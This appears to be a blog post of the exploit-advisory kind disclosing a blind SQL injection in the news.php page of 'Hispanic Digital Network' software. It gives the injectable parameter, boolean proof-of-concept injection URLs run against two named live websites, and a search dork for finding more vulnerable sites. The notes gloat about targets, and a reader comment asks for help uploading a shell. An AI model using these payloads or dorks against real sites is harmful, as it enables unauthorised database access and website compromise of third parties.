Hispanic Digital Network Blind SQL Injection Vuln

[o] Hispanic Digital Network Blind SQL Injection Vulnerability
Software : Hispanic Digital Network
Vendor : http://www.hdnweb.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Vulnerable file
news.php

[o] Exploit
http://localhost/[path]/news.php?nid=[Blind SQL]

[o] Proof of Concept
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4 = false
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5 = true
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=4 = false
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=5 = true

[o] Dork
"powered by Hispanic Digital Network"


[o] Notes
fucking private script again and all target are in one IP address. lol

3 Responses so far.

  1. plz help upload the shell !

  2. Brian says:

    online marketing Can be hard to figure out. Work with a company that has experience and knowledge.

  3. Blogger says:

    DreamHost is ultimately one of the best web-hosting provider for any hosting plans you might need.